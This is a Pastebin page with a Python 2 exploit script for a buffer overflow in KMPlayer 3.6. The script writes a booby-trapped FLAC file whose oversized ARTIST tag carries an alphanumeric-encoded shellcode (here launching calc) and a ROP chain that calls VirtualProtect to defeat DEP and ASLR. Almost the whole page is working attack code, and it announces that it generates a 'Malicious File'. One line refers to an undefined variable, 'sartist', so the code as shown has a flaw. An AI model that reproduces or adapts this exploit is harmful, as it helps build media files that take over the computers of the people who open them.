SHARE
TWEET

KMPlayer 3.6 exploit

a guest Nov 11th, 2015 3,668 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from socket import *
  2. import sys
  3. import struct
  4. import time
  5.  
  6. """
  7. Kmplayer 3.6 Buffer Overflow exploit
  8. *Very* Low Reliablity :I
  9. By sweetchip
  10.  
  11. """
  12. print "\n[*] Kmplayer Exploit | Bypadd ASLR. DEP | ASCII only"
  13. print "[*] Author : sweetchip | 2013.04.18\n"
  14. print "[*] Public Release Date : 2015.11.12"
  15.  
  16. filename = "Exploit_bypass_ASLR_DEP.flac"
  17.  
  18. # Header
  19. Head1 = ("\x66\x4C\x61\x43\x00\x00\x00\x22\x10\x00\x10\x00\x00\x0B\x3E\x00\x2E"
  20.                  "\x50\x0B\xB8\x02\xF0\x00\x91\x57\x93\x6F\x0C\x93\x12\xF9\xE0\x24\xF7"
  21.                  "\x6B\x80\x38\x24\x7A\xBC\x64\x5A\x04")
  22. head2 = "\x00\x00\x00\x01\x00\x00\x00"
  23. EndofHead = ("\x81\x00\xA4\x46")
  24.  
  25. # cmd = calc
  26. # encoder - x86/alpha_mixed
  27. shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
  28.                         "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
  29.                         "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42"
  30.                         "\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x7a\x48"
  31.                         "\x6c\x49\x55\x50\x53\x30\x43\x30\x55\x30\x4c\x49\x49\x75"
  32.                         "\x54\x71\x4e\x32\x32\x44\x6c\x4b\x33\x62\x70\x30\x4e\x6b"
  33.                         "\x62\x72\x56\x6c\x4c\x4b\x72\x72\x44\x54\x4e\x6b\x71\x62"
  34.                         "\x35\x78\x64\x4f\x4d\x67\x42\x6a\x57\x56\x44\x71\x59\x6f"
  35.                         "\x70\x31\x79\x50\x6e\x4c\x77\x4c\x70\x61\x61\x6c\x46\x62"
  36.                         "\x44\x6c\x55\x70\x5a\x61\x68\x4f\x54\x4d\x67\x71\x58\x47"
  37.                         "\x6a\x42\x58\x70\x32\x72\x71\x47\x4e\x6b\x46\x32\x52\x30"
  38.                         "\x4e\x6b\x30\x42\x75\x6c\x75\x51\x6a\x70\x6e\x6b\x31\x50"
  39.                         "\x50\x78\x4d\x55\x69\x50\x53\x44\x72\x6a\x37\x71\x38\x50"
  40.                         "\x66\x30\x4e\x6b\x37\x38\x64\x58\x4e\x6b\x43\x68\x77\x50"
  41.                         "\x36\x61\x59\x43\x6a\x43\x67\x4c\x73\x79\x4c\x4b\x54\x74"
  42.                         "\x4e\x6b\x77\x71\x7a\x76\x55\x61\x79\x6f\x65\x61\x69\x50"
  43.                         "\x4e\x4c\x69\x51\x5a\x6f\x44\x4d\x46\x61\x78\x47\x50\x38"
  44.                         "\x49\x70\x30\x75\x4a\x54\x65\x53\x71\x6d\x38\x78\x75\x6b"
  45.                         "\x73\x4d\x65\x74\x72\x55\x59\x72\x62\x78\x4c\x4b\x53\x68"
  46.                         "\x36\x44\x57\x71\x69\x43\x62\x46\x6e\x6b\x74\x4c\x42\x6b"
  47.                         "\x4c\x4b\x31\x48\x47\x6c\x63\x31\x78\x53\x6c\x4b\x37\x74"
  48.                         "\x4e\x6b\x33\x31\x4a\x70\x6d\x59\x42\x64\x44\x64\x47\x54"
  49.                         "\x51\x4b\x33\x6b\x35\x31\x31\x49\x33\x6a\x73\x61\x79\x6f"
  50.                         "\x59\x70\x62\x78\x33\x6f\x33\x6a\x4e\x6b\x64\x52\x5a\x4b"
  51.                         "\x6c\x46\x53\x6d\x30\x6a\x33\x31\x6c\x4d\x4e\x65\x4f\x49"
  52.                         "\x45\x50\x33\x30\x37\x70\x36\x30\x51\x78\x46\x51\x6c\x4b"
  53.                         "\x50\x6f\x6e\x67\x79\x6f\x78\x55\x4f\x4b\x48\x70\x4d\x65"
  54.                         "\x6c\x62\x31\x46\x33\x58\x6c\x66\x4c\x55\x6f\x4d\x4d\x4d"
  55.                         "\x4b\x4f\x48\x55\x35\x6c\x55\x56\x63\x4c\x77\x7a\x6d\x50"
  56.                         "\x79\x6b\x39\x70\x74\x35\x45\x55\x4f\x4b\x62\x67\x46\x73"
  57.                         "\x74\x32\x42\x4f\x63\x5a\x45\x50\x53\x63\x69\x6f\x4b\x65"
  58.                         "\x55\x33\x43\x51\x52\x4c\x61\x73\x37\x70\x41\x41")
  59.  
  60.  
  61. #############################################################################################################################################
  62. ##### ROP
  63. ##### special thanks to mona and corelan team
  64. #############################################################################################################################################
  65. rop_gadgets = ""
  66. rop_gadgets += struct.pack('<I',0x10064b1f)# XCHG EAX,ESP # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  67. rop_gadgets += struct.pack('<L',0x10126c47) #POP EAX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  68. rop_gadgets += struct.pack('<L',0x11047e74) # ptr to &VirtualProtect() [IAT bass.dll]
  69. rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
  70. rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
  71. rop_gadgets += "DEAD"
  72. rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
  73. rop_gadgets += "BEEF"
  74. rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
  75. rop_gadgets += "SWEE"
  76. rop_gadgets += struct.pack('<L',0x10120637) * 337 # INC EAX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  77. rop_gadgets += struct.pack('<L',0x11022f69) # MOV EAX,DWORD PTR DS:[EAX] # RETN [bass.dll]
  78. rop_gadgets += struct.pack('<L',0x11033e30) # XCHG EAX,ESI # RETN [bass.dll]
  79. rop_gadgets += struct.pack('<L',0x10060210) # POP EBP # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  80. rop_gadgets += struct.pack('<L',0x10146f65) # PUSH ESP # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  81. rop_gadgets += struct.pack('<L',0x11010754) # POP EBX # RETN    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
  82. rop_gadgets += struct.pack('<L',0x00005050) # 0x00000201-> ebx
  83. rop_gadgets += struct.pack('<L',0x10126623) # POP EDX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  84. rop_gadgets += struct.pack('<L',0x00000040) # 0x00000040-> edx
  85. rop_gadgets += struct.pack('<L',0x1013555c) # POP ECX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  86. rop_gadgets += struct.pack('<L',0x7d782020) # Writable location 7d782020
  87. rop_gadgets += struct.pack('<L',0x10120b13) # POP EDI # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  88. rop_gadgets += struct.pack('<L',0x100d0240) # RETN (ROP NOP) [bass_wv.dll]
  89. rop_gadgets += struct.pack('<L',0x10126c47) # POP EAX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  90. rop_gadgets += struct.pack('<L',0x44444444) # inc inc inc inc lol
  91. rop_gadgets += struct.pack('<L',0x1001442e) # PUSHAD # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  92. #############################################################################################################################################
  93.  
  94. stage1 = ""
  95. stage1 += "C" * 3028
  96. stage1 += rop_gadgets
  97. stage1 += shellcode
  98.  
  99. #65536
  100. # trigger a BOF / and will Execute shellcode
  101. artist = "ARTIST="
  102. artist += "A" * 60000
  103. artist += "A" * 4848
  104. artist += struct.pack('<I', 0x7d79192c)
  105. artist += "A" * 137
  106. artist += struct.pack('<I', 0x10402f0f) # POP ESP # RETN    ** [bass_flac.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
  107. artist += struct.pack('<I', 0x7d791930) # ptr to 7d761930
  108. artist += "B" * (140000 -4848-4-4-4-137)
  109. artist += stage1
  110. artist += "Z" * (65536-len(stage1))
  111. artist += stage1
  112. artist += "Z" * (65536-len(stage1))
  113. artist += stage1
  114. artist += "Z" * (65536-len(stage1))
  115. artist += stage1
  116. artist += "Z" * (65536-len(stage1))
  117. artist += stage1
  118. artist += "Z" * (65536-len(stage1))
  119. artist += stage1
  120. artist += "Z" * (65536-len(stage1))
  121. artist += stage1
  122. artist += "Z" * (65536-len(stage1))
  123.  
  124. #artist += "C" * 3028
  125. #artist += rop_gadgets
  126. #artist += shellcode
  127. sartist += "A" * 100000
  128. artistlength = struct.pack('<I', len(artist))
  129.  
  130. # length
  131. payloadlen = struct.pack('>I', len(head2 + EndofHead + artistlength + artist)*256)
  132.  
  133. # Payload.
  134. exploit = Head1
  135. exploit += payloadlen
  136. exploit += head2
  137. exploit += artistlength
  138. exploit += artist
  139. exploit += EndofHead
  140. exploit += "\x00" * 118000
  141.  
  142. print "\n[*] Generating Flac file....."
  143. print "[ ] Payload size :", (len(exploit))
  144. print "[ ] Shellcode size : \n"
  145.  
  146. f = open(filename,'w')
  147. f.write(exploit)
  148. f.close()
  149.  
  150. print "[*] Malicious File generated Successfully!!!"
  151. print "[ ] file name : " + filename
  152.  
  153. raw_input("\npress enter to continue :D . . . . .")
  154. #End OF Source.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top